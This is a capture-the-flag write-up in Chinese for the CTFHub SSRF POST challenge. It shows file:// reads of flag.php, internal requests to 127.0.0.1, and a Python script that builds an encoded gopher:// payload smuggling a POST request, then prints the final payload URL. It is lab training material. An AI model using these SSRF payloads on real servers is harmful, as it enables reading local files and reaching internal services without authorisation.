CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
一个脚本boy34 分钟前
【troll2靶机的完整详细渗透测试过程附靶机链接】
web安全·网络安全
爱写代码的汤二狗2 小时前
第3章 应用解构:一眼看穿应用的本质
人工智能·经验分享·创业创新
卡梅德生物科技小能手2 小时前
深度解析免疫靶点CD28(CD28分子):从双信号机制到药物研发的技术全景
经验分享·深度学习·生活
弘毅 失败的 mian2 小时前
Linux 进程属性详解
linux·运维·服务器·经验分享·笔记
土豆.exe2 小时前
Claude Code — 源码泄露 (2026-03-31)
网络安全
优化控制仿真模型2 小时前
【26专四】英语专业四级TEM4历年真题及答案解析电子版PDF(2009-2025年)
经验分享·pdf
大方子3 小时前
【PolarCTF】 上传
网络安全·polarctf
unable code3 小时前
[HNCTF 2022 WEEK2]ez_ssrf
网络安全·web·ctf·1024程序员节
一名优秀的码农3 小时前
vulhub系列-49-devguru(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析